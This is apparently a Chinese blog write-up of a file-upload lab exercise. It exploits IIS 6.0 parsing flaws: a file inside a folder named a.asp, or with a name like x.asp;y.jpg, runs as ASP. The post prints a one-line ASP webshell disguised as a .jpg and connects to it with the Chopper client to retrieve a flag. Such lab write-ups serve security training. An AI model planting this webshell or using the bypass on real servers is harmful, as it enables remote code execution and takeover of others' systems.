美文网首页
文件上传靶场—IIS6.0解析漏洞(三)

文件上传靶场—IIS6.0解析漏洞(三)

作者: N8_xEnn7nA1 | 来源:发表于2018-11-13 12:26 被阅读0次

IIS6.0 有以下文件解析漏洞:

  • 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析;
  • 文件名如:xxx.asp;yyy.jpg 的文件,会忽略分号后面的后缀,将该文件当成asp脚本进行解析
  • asa、cer、cdx 也会被当成asp脚本进行解析

查看源码:

image.png

这里只允许后缀为 jpg 的文件上传,

我的一句话木马内容为:

<%eval request("heroes")%>

保存为 ladybird253.jpg,上传结果如下:

image.png

可以看到上传后的文件所在的目录为 a.asp,这就可以利用 开头提到的 IIS6.0 的解析漏洞,在 xxx.asp 目录下的文件都会被当做asp脚本。

然后用菜刀连接:

image.png

进入保存上传文件的目录中找到flag文件:

image.png

相关文章

网友评论

      本文标题:文件上传靶场—IIS6.0解析漏洞(三)

      本文链接:https://www.haomeiwen.com/subject/kawkfqtx.html